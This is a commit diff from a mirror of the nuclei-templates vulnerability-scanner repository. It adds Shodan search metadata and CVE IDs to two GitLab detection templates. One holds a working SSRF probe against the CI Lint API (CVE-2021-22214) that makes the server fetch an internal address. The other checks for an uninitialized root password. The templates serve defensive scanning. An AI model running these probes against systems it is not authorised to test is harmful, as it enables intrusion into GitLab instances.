daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added gitlab metadata

patch-1
sandeep 2022-03-04 19:20:03 +05:30
parent 5a4935ca4d
commit 9f5cc1ca80
2 changed files with 15 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
cves/2021/CVE-2021-22214.yaml
View File

@ -1,6 +1,7 @@
id: CVE-2021-22214 id: CVE-2021-22214
info: info:
author: Suman_Kar (modified by GitLab Red Team) author: Suman_Kar,GitLab Red Team
name: Unauthenticated Gitlab SSRF - CI Lint API name: Unauthenticated Gitlab SSRF - CI Lint API
severity: high severity: high
description: | description: |
@ -19,26 +20,30 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175 - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html - https://docs.gitlab.com/ee/api/lint.html
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2021,gitlab,ssrf tags: cve,cve2021,gitlab,ssrf
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60 cvss-score: 8.60
cve-id: CVE-2021-22214 cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175
cwe-id: CWE-918 cwe-id: CWE-918
requests: requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true" - "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"
body: |
{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}
headers: headers:
Content-Type: application/json Content-Type: application/json
body: |
{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}
redirects: true redirects: true
max-redirects: 3 max-redirects: 3
matchers-condition: and
# Check for strictly known-vulnerable replies in the body
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "does not have valid YAML syntax" - "does not have valid YAML syntax"

4
misconfiguration/gitlab/gitlab-uninitialized-password.yaml
View File

@ -8,11 +8,13 @@ info:
Prior to version 14, GitLab installations required a root password to be Prior to version 14, GitLab installations required a root password to be
set via the web UI. If the administrator skipped this step, any visitor set via the web UI. If the administrator skipped this step, any visitor
could set a password and control the instance. could set a password and control the instance.
tags: gitlab,misconfig,unauth metadata:
shodan-query: http.title:"GitLab"
reference: reference:
- https://gitlab.com/gitlab-org/gitlab/-/issues/211328 - https://gitlab.com/gitlab-org/gitlab/-/issues/211328
- https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331
- https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password
tags: gitlab,misconfig,unauth
requests: requests:
- method: GET - method: GET